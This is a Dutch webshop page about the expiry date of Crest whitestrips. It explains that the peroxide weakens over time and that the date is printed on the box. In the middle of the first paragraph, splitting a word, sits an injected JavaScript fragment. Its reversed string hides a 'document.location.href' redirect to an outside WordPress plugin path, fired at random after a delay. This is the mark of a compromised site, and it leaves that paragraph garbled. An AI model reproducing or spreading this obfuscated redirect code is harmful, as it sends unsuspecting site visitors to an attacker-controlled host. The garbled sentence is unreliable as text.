Houdbaarheidsdatum Crest whitestrips

 

De houdbaarheidsdatum van whitestrips is ontzettend belangrijk. Omdat de werkzame stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof die de whitstrips in tact houdt peroxide is. Naar mate de whitestrips ouder zijn zal de werking van peroxide afnemen. De plakstrips zullen minder effectief zijn. Je tanden zullen minder wit worden en kunnen mogelijk pijn gaan doen. Nu wil je graag weten hoe je achter de houdbaarheidsdatum kan komen van de crest whitestrips? Dit staat vermeld op de doos van de strips.

Crest whitestrips op Dental-white.nl

Alle crest producten die u via onze webwinkel koopt hebben een minimale houdbaarheid van een jaar. Wij houden rekening met de wensen van onze klanten. Het gebit kan ontzettend kwetsbaar zijn. Wij zouden niet willen dat je door onze crest whitestrips pijn krijgt, of niet het optimale resultaat. De houdbaarheidsdatum van de crest whitestrips kunnen wij niet bij elk productbestelling voegen. Mocht u de houdbaarheidsdatum willen weten dan kan u ons altijd contacten via het contactformulier.

Wij leveren uitsluitend originele crest whitestrips. Dit zijn geen goedkope plakstrips die nagemaakt zijn in China en ontzettend goedkoop geleverd kunnen worden. Als je de houdbaarheidsdatum wil controleren bestel dan een complete doos. De houdbaarheidsdatum staat vermeld onderaan de doos zo kan je zelf de datum controleren.